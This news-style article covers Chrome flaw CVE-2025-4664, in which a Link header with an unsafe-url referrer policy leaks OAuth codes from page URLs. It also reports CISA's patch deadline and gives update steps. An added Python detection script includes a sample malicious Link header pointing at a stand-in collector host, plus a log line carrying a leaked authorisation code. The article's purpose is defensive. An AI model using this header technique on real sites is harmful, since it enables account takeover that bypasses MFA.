CISA gives Chrome users 21 days to patch CVE-2025-4664 or stop using the browser
Google has sounded the alarm for the estimated two billion Chrome users worldwide: update your Google Chrome browser immediately. A high-severity flaw, tracked as CVE-2025-4664, lets a malicious web page leak data from another site's URL, including the OAuth authorisation codes and session tokens that some sites carry in their query strings. An attacker who captures one of those values after the victim has already signed in can walk into the account without ever being challenged for multi-factor authentication (MFA).
The United States Cybersecurity and Infrastructure Security Agency (CISA) added the flaw to its Known Exploited Vulnerabilities catalogue on May 14, 2025 and, under Binding Operational Directive 22-01, requires federal civilian agencies to apply Google's patch by June 5, 2025, a 21-day window. The catalogue's standing instruction is to apply the vendor's fix or, where no fix can be applied, to discontinue use of the product. While the directive binds only US federal agencies, CISA urges all organisations and home users to act with the same urgency.
What makes this flaw dangerous is how little it takes to exploit. Security researcher Vsevolod Kokorin (Slonser) of Solidlab found that Chrome, unlike other browsers, honoured the HTTP Link header on subresource requests such as images, and that a Link header can set a referrer policy. A page that embeds an attacker-controlled image can therefore have the attacker's server answer with a Link header specifying referrerpolicy=unsafe-url, and Chrome applied that policy to the resulting preload request, sending the full URL of the embedding page, query string included, as the Referer to the attacker's server. Many OAuth login flows pass an authorisation code or token in exactly that query string, so a third party could capture it and replay it to obtain the victim's session without ever seeing an MFA prompt. Google describes the bug as insufficient policy enforcement in Chrome's Loader component that allowed a remote attacker to leak cross-origin data via a crafted HTML page.
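To make the leak pattern concrete, here is an added example in Python, not from the article or from the researcher's proof of concept, that checks captured traffic for the two observable symptoms of the pattern: a Link header on a subresource response that requests referrerpolicy=unsafe-url, and a Referer that carries OAuth-style secrets in its query string. The response headers and access-log lines it scans are constructed for illustration; the log format, the hostnames and the list of sensitive parameter names are assumptions.

```python
"""Added example: flag the observable symptoms of the CVE-2025-4664 leak pattern.

Not from the article or the researcher's proof of concept. The response headers,
log lines, hostnames and log format below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Query parameter names that typically carry OAuth or session material (assumed list).
SENSITIVE_PARAMS = {"code", "access_token", "id_token", "token", "state", "session", "sessionid"}

# Constructed access-log format: <client> "<method> <path> <proto>" <status> "<referer>"
LOG_LINE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) "(?P<referer>[^"]*)"$'
)


def parse_link_header(value):
    """Parse an RFC 8288 Link header into (url, {param: value}) pairs.

    Parameter names and values are lower-cased; surrounding quotes are dropped.
    """
    links = []
    # Split only on commas that start a new <url> link-value, not commas inside parameters.
    for part in re.split(r",(?=\s*<)", value):
        m = re.match(r"\s*<([^>]*)>\s*(.*)", part, re.S)
        if not m:
            continue
        url, rest = m.group(1), m.group(2)
        params = {}
        for p in rest.split(";"):
            p = p.strip()
            if not p:
                continue
            key, _, val = p.partition("=")
            params[key.strip().lower()] = val.strip().strip('"').lower()
        links.append((url, params))
    return links


def unsafe_link_preloads(headers):
    """Return target URLs from Link headers that ask for an unsafe-url referrer policy.

    Before Chrome 136.0.7103.113 such a header on a subresource response made the
    browser send the embedding page's full URL as the Referer on the preload request.
    """
    hits = []
    for name, value in headers:
        if name.lower() != "link":
            continue
        for url, params in parse_link_header(value):
            if params.get("referrerpolicy") == "unsafe-url":
                hits.append(url)
    return hits


def sensitive_query_params(url):
    """Return the sorted names of sensitive parameters in a URL's query string."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k in query if k.lower() in SENSITIVE_PARAMS)


def leaked_referers(log_lines):
    """Scan access-log lines and report requests whose Referer carried secrets."""
    findings = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        referer = m.group("referer")
        leaked = sensitive_query_params(referer)
        if leaked:
            parts = urlsplit(referer)
            findings.append({
                "src": m.group("src"),
                "path": m.group("path"),
                "referer_origin": f"{parts.scheme}://{parts.netloc}",
                "leaked": leaked,
            })
    return findings


# Constructed sample data (not real traffic).
SAMPLE_RESPONSE_HEADERS = [
    ("Content-Type", "image/png"),
    ("Link", '<https://collector.example/pixel.gif>; rel="preload"; as="image"; referrerpolicy="unsafe-url"'),
]

SAMPLE_LOG = [
    '203.0.113.7 "GET /pixel.gif HTTP/1.1" 200 "https://app.example/oauth/callback?code=SplxlOBeZQQYbYS6WxSbIA&state=af0ifjsldkj"',
    '203.0.113.7 "GET /logo.png HTTP/1.1" 200 "https://app.example/"',
    '198.51.100.9 "GET /pixel.gif HTTP/1.1" 200 "-"',
]


if __name__ == "__main__":
    for url in unsafe_link_preloads(SAMPLE_RESPONSE_HEADERS):
        print(f"Link header requests unsafe-url referrer for {url}")
    for f in leaked_referers(SAMPLE_LOG):
        print(f"{f['src']} fetched {f['path']} with Referer from {f['referer_origin']} "
              f"carrying {', '.join(f['leaked'])}")
```

In practice you would feed the first check response headers captured at a proxy and the second check the Referer field of your own servers' access logs. A hit on the second check means a secret has already left the browser: treat that authorisation code or token as compromised and revoke it, because patching Chrome afterwards does not recall what was already sent.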
Google's advisory says the company is aware of reports that an exploit for CVE-2025-4664 exists in the wild, and the researcher has published details and a proof of concept. Google shipped a fix in Chrome 136.0.7103.113/.114 for Windows and macOS and 136.0.7103.113 for Linux on May 14, 2025. With the technique public, the threat window is at its widest: attackers can try it against anyone who has not yet restarted into the patched version.
Chrome's global market share makes the flaw unusually consequential. Two billion users, from casual browsers to enterprise staff, rely on it for banking, email and business-critical communications. Because the leak happens inside the browser, a site's own defences never see anything wrong: the attacker simply replays a code or token the browser handed over, and MFA, already completed before the leak, is not asked for again.
CISA's guidance is clear: if your organisation or personal device cannot apply the patch, discontinue using Chrome until it can. Consider another browser in the interim to avoid account takeovers and the data breaches that follow them.
Beyond government and enterprise, everyday users face the same risk. An attacker holding a leaked code or token can silently take over the account, quietly pull data out of it, or use the victim's identity to launch further targeted attacks.
This incident underscores the relentless contest between defenders and threat actors. Even Google can ship a vulnerability in a codebase that millions depend on daily.
The 21-day deadline is tight, but justified. Update Chrome now through its built-in updater: open chrome://settings/help, confirm the version shown is 136.0.7103.113 or later, and relaunch the browser so the update actually takes effect, since a downloaded update does nothing until Chrome restarts. Every day of delay widens the window for attackers.
In the meantime, stay vigilant. Unusual login alerts, unexpected account activity or odd browser behaviour should be reported and investigated promptly. Multi-factor authentication, although sidestepped here, remains essential as part of layered security; it still defeats many other kinds of attack.
This crisis also highlights the growing importance of government agencies like CISA in cybersecurity governance, enforcing mandates that protect national security and private citizens alike from increasingly sophisticated cyber threats.
In short, the message is stark: Chrome users have 21 days to update or risk catastrophic account compromises. This threat is real, urgent, and indiscriminate. The clock is ticking.